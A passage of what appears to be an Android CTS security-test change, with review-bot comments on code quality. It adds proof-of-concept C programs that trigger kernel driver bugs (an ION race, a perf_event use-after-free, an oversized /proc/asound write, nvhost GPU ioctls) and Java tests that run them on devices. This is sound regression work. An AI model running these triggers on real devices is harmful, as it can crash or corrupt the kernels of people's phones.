+void trigger_ion_free() {
+    ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+    }
+}
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(-19, 2);
+    while (1) {
+        pthread_mutex_lock(&mutex);
+        pthread_cond_wait(&cond, &mutex);
+        trigger_ion_free();
+        pthread_mutex_unlock(&mutex);  
+    }
+    
+}
+
+
+int main(int argc, char**argv) {
+    if (open_driver() < 0) {
+        return -1;
+    }
+    setup_privi_and_affinity(0, 1);
+    prepare_data();
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    sleep(1);
+    while (1) {
+        pthread_cond_signal(&cond);
+        usleep(100);
+        trigger_ion_alloc();
+        sleep(1);
+    }
+
+    return 0;
+}
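Review bot: In `prepare_data` the results of `malloc` and `mprotect` are never checked and `errno` is printed unconditionally, so the log shows whatever stale value errno holds and a failed setup looks the same as a successful one. `mprotect` needs a page-aligned address, which `malloc(0x1000)` does not promise, so the call may fail and the test would then run with a buffer that is not in the state it intends. I would check both calls and stop on failure, e.g. `if (mprotect(data, 0x1000, PROT_READ) != 0) { printf("[*] mprotect failed, errno=%d\n", errno); exit(1); }`. `race_thread` is declared `void*` but has no return statement, and the empty `if` body after `sched_setaffinity` drops that error silently.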
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+  /*
+   * Major type: hardware/software/tracepoint/etc.
+   */
+  __u32     type;
+
+  /*
+   * Size of the attr structure, for fwd/bwd compat.
+   */
+  __u32     size;
+
+  /*
+   * Type specific configuration information.
+   */
+  __u64     config;
+
+  union {
+    __u64   sample_period;
+    __u64   sample_freq;
+  };
+
+  __u64     sample_type;
+  __u64     read_format;
+
+  __u64     disabled       :  1, /* off by default        */
+        inherit        :  1, /* children inherit it   */
+        pinned         :  1, /* must always be on PMU */
+        exclusive      :  1, /* only group on PMU     */
+        exclude_user   :  1, /* don't count user      */
+        exclude_kernel :  1, /* ditto kernel          */
+        exclude_hv     :  1, /* ditto hypervisor      */
+        exclude_idle   :  1, /* don't count when idle */
+        mmap           :  1, /* include mmap data     */
+        comm         :  1, /* include comm data     */
+        freq           :  1, /* use freq, not period  */
+        inherit_stat   :  1, /* per task counts       */
+        enable_on_exec :  1, /* next exec enables     */
+        task           :  1, /* trace fork/exit       */
+        watermark      :  1, /* wakeup_watermark      */
+        /*
+         * precise_ip:
+         *
+         *  0 - SAMPLE_IP can have arbitrary skid
+         *  1 - SAMPLE_IP must have constant skid
+         *  2 - SAMPLE_IP requested to have 0 skid
+         *  3 - SAMPLE_IP must have 0 skid
+         *
+         *  See also PERF_RECORD_MISC_EXACT_IP
+         */
+        precise_ip     :  2, /* skid constraint       */
+        mmap_data      :  1, /* non-exec mmap data    */
+        sample_id_all  :  1, /* sample_type all events */
+
+        exclude_host   :  1, /* don't count in host   */
+        exclude_guest  :  1, /* don't count in guest  */
+
+        exclude_callchain_kernel : 1, /* exclude kernel callchains */
+        exclude_callchain_user   : 1, /* exclude user callchains */
+        constraint_duplicate : 1,
+
+        __reserved_1   : 40;
+
+  union {
+    __u32   wakeup_events;    /* wakeup every n events */
+    __u32   wakeup_watermark; /* bytes before wakeup   */
+  };
+
+  __u32     bp_type;
+  union {
+    __u64   bp_addr;
+    __u64   config1; /* extension of config */
+  };
+  union {
+    __u64   bp_len;
+    __u64   config2; /* extension of config1 */
+  };
+  __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+  /*
+   * Defines set of user regs to dump on samples.
+   * See asm/perf_regs.h for details.
+   */
+  __u64 sample_regs_user;
+
+  /*
+   * Defines size of the user stack to dump on samples.
+   */
+  __u32 sample_stack_user;
+
+  /* Align to u64. */
+  __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+  printf("id=%d arg=%d\n",gettid(),arg);
+
+  int i;
+  struct perf_event_attr attr;
+
+  switch ((long)arg) {
+  case 0:
+    //#16123
+    printf("thread 0\n");
+    memset(&attr,0,sizeof(struct perf_event_attr));
+    attr.type = 1;
+    attr.size = sizeof(struct perf_event_attr);
+    attr.config = 1;
+
+      group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+                    -1, 0x1ul, 0);
+
+      if(group_fd[0]<0){
+        perror("perf-group:");
+      }
+
+
+    memset(&attr,0,sizeof(struct perf_event_attr));
+    attr.type = 1;
+    attr.size = sizeof(struct perf_event_attr);
+    attr.config = 5;
+
+      child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+      if(group_fd[0]<0){
+        perror("perf-child:");
+      }
+
+    created = 1;
+    break;
+  case 1:
+
+    while(!created){
+      sleep(1);
+    }
+
+    printf("thread 1\n");
+    close(group_fd[0]);
+
+    freed = 1;
+
+    break;
+  case 2:
+
+    printf("thread 2\n");
+
+    while(!freed){
+      sleep(1);
+    }
+
+      close(child_fd[0]);
+
+    finished = 1;
+
+    break;
+
+  }
+  return 0;
+}
+
+int poc() {
+  long i;
+  pthread_t th[5];
+  for (i = 0; i < 3; i++) {
+    pthread_create(&th[i], 0, thr, (void *)i);
+    usleep(10000);
+  }
+
+  while(!finished){
+    sleep(1);
+  }
+
+  return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+  int pid;
+  unsigned int times;
+  times = 0;
+  printf("POC3\n");
+  printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+  fflush(stdout);
+
+  // while(1){
+    pid = fork();
+    if(pid){
+      int status;
+      int ret = waitpid(pid,&status,0);
+
+      printf("[%d]times.\r",times);
+      times++;
+    }else
+      return poc();
+  // }
+  return 0;
+}
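Review bot: The error check after the second `perf_event_open` call in `thr` tests `group_fd[0]` again instead of `child_fd[0]`, so a failure to create the child event is never reported; it should read `if(child_fd[0]<0){`. The first `printf` in `thr` passes `arg` (a `void *`) for `%d`, which is a format mismatch; `(long)arg` with `%ld` matches the cast already used in the `switch`. `created`, `freed` and `finished` are plain `long`s written and polled from different threads without synchronisation, and `poc` never joins the threads it creates. `i` in `thr` and `status`/`ret` in `main` are unused.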
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+	memset(buf, 0xa0, sizeof(buf));
+
+	int fd = open("/proc/asound/version", O_RDWR);
+	if(fd != -1){
+		lseek(fd, 0x1234567800000000, SEEK_SET);
+		write(fd, buf, sizeof(buf));
+	}else{
+		perror("open error\n");
+	}
+	close(fd);
+	return 0;
+}
\ No newline at end of file
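Review bot: `close(fd)` runs even when `open` failed, so the error path calls `close(-1)`; moving it into the success branch after `write` fixes that. The return values of `lseek` and `write` are discarded and nothing is printed on the success path, so the host side cannot tell from the output whether the kernel rejected the write. Printing the result and `errno` of `write` would make the outcome checkable. `perror("open error\n")` puts a newline before the colon and the errno text; `perror("open error")` reads correctly.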
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...)   printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...)   printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ 	return ret;
+}
+
+#define SZ_128K				0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+	__u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+	_IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+	__u64 offset; /* in, byte address */
+	__u32 pages;     /* in, pages */
+	__u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+	_IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+	__u32 pages;     /* in, pages */
+	__u32 page_size; /* in, bytes */
+	__u32 flags;     /* in */
+	__u32 padding;     /* in */
+	union {
+		__u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+		__u64 align;  /* in, alignment multiple (0:={1 or n/a}) */
+	} o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+	_IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM	1
+#define TRY_TIMES		2
+#define NVMAPDEV	"/dev/nvmap"
+#define GPUDEV		"/dev/nvhost-gpu"
+#define ASDEV		"/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+	int i, j, ret;
+	int dma1, dma2;
+	struct nvmap_create_handle args = { 
+		.size = PAGE_SIZE
+	};
+	struct nvhost_as_bind_channel_args as_bind = { 0 };
+	struct nvhost_as_alloc_space_args alloc = {
+		.pages = 1,
+		.page_size =  SZ_128K,
+		.flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+	};
+	struct nvhost_as_free_space_args free_arg = {
+		.pages = 1,
+		.page_size = SZ_128K
+	};
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	nvmap = open(NVMAPDEV, O_RDONLY);
+	if(nvmap == -1) {
+		ERR("[-] open %s failed", NVMAPDEV);
+		goto __cleanup;
+	}
+	gpu = open(GPUDEV, O_RDONLY);
+	if(gpu == -1) {
+		ERR("[-] open %s failed", GPUDEV);
+		goto __cleanup;
+	}
+	asgpu = open(ASDEV, O_RDONLY);
+	if(asgpu == -1) {
+		ERR("[-] open %s failed", ASDEV);
+		goto __cleanup;
+	}
+	// bind the channel
+	as_bind.channel_fd = gpu;
+	ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+	if(ret == -1) {
+		ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+		goto __cleanup;
+	} else {
+		//LOG("[+] ioctl OK, channel is bond");
+	}
+
+	#if 1
+	// prepare 
+	ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+	if(ret) {
+		ERR("[-] NVMAP_IOC_CREATE failed");
+		goto __cleanup;
+	}
+	#endif
+
+	ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+	if(ret) {
+		ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+		goto __cleanup;
+	}
+	free_arg.offset = alloc.o_a.offset;
+	ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+	if(ret) {
+		ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+		goto __cleanup;
+	}
+
+__cleanup:
+	close(nvmap);
+	close(gpu);
+	close(asgpu);
+	return 0;
+}
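Review bot: `nvmap`, `gpu` and `asgpu` are zero-initialised globals, so when the first `open` fails and control jumps to `__cleanup`, `close(gpu)` and `close(asgpu)` close descriptor 0 (stdin) and `close(nvmap)` is called with -1. Initialising them as `int nvmap = -1, gpu = -1, asgpu = -1;` and guarding each close (`if (gpu != -1) close(gpu);`) keeps cleanup to descriptors this program opened. `main` returns 0 on every path, so a failed setup and a completed run are indistinguishable by exit status. `i`, `j`, `dma1`, `dma2`, `close_thread_id` and `attack` are unused.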
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
 
 public class AdbUtils {
 
@@ -39,8 +40,7 @@
      * @param device device for the command to be ran on
      * @return the console output from running the command
      */
-    public static String runCommandLine(String command, ITestDevice device) throws Exception
-    {
+    public static String runCommandLine(String command, ITestDevice device) throws Exception {
         return device.executeShellCommand(command);
     }
 
@@ -51,17 +51,25 @@
      * @param device device to be ran on
      * @return the console output from the binary
      */
-    public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
-        String fullResourceName = pathToPoc;
-        File pocFile = File.createTempFile("poc", "");
-        try {
-            pocFile = extractResource(fullResourceName, pocFile);
-            device.pushFile(pocFile, "/data/local/tmp/poc");
-            device.executeShellCommand("chmod +x /data/local/tmp/poc");
-            return device.executeShellCommand("/data/local/tmp/poc");
-        } finally {
-            pocFile.delete();
-        }
+    public static String runPoc(String pocName, ITestDevice device) throws Exception {
+        device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+        return device.executeShellCommand("/data/local/tmp/" + pocName);
+    }
+
+    /**
+     * Pushes and runs a binary to the selected device
+     *
+     * @param pathToPoc a string path to poc from the /res folder
+     * @param device device to be ran on
+     * @param timeout time to wait for output in seconds
+     * @return the console output from the binary
+     */
+    public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+        device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+        CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+        device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+        String output = receiver.getOutput();
+        return output;
     }
 
     /**
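Review bot: The Javadoc added for the timeout overload of `runPoc` does not match the code: it says "Pushes and runs a binary" and documents `@param pathToPoc a string path to poc from the /res folder`, while the parameter is `pocName` and nothing is pushed any more. The method assumes the file already sits in `/data/local/tmp/`, so I would write `@param pocName name of a PoC binary already present in /data/local/tmp` and drop "Pushes and" from the summary; the comment above the first overload probably needs the same change, though its `@param` line is outside the hunk. `pocName` is concatenated into the shell command unquoted, which is fine for the literal names the tests pass but worth stating in the comment. `CollectingOutputReceiver` needs an import in this file and the hunks shown add only `TimeUnit`, so confirm it is already imported.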
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..d04ebea
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,107 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_10 extends SecurityTestCase {
+
+    /**
+     *  b/30904789
+     */
+    @SecurityTest
+    public void testPocCVE_2016_6730() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/30906023
+     */
+    @SecurityTest
+    public void testPocCVE_2016_6731() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/30906599
+     */
+    @SecurityTest
+    public void testPocCVE_2016_6732() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/30906694
+     */
+    @SecurityTest
+    public void testPocCVE_2016_6733() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/30907120
+     */
+    @SecurityTest
+    public void testPocCVE_2016_6734() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/30907701
+     */
+    @SecurityTest
+    public void testPocCVE_2016_6735() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/30953284
+     */
+    @SecurityTest
+    public void testPocCVE_2016_6736() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+        }
+    }
+}
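Review bot: None of the seven tests reads the value returned by `AdbUtils.runPoc` or asserts anything, so a PoC that never ran is indistinguishable from a patched device. Because `runPoc` no longer pushes the binary, a missing `/data/local/tmp/CVE-2016-6730` only produces a shell error string that is thrown away. The verdict presumably comes from the crash check in `SecurityTestCase`, which this file does not show, so I would add a class comment such as `// Pass/fail is decided by the base-class device-crash check; runPoc output is ignored` and fail the test when the binary is absent. The same applies to the tests in Poc16_12.java and Poc17_01.java. Every import above the class except the `SecurityTest` annotation is unused in this file.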
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..a6160d5
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,258 @@
+/**
+0;256;0c * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+    //Criticals
+    /**
+     *  b/31606947
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8424() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvmap")) {
+            AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31797770
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8425() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+            AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31799206
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8426() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+            AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31799885
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8427() throws Exception {
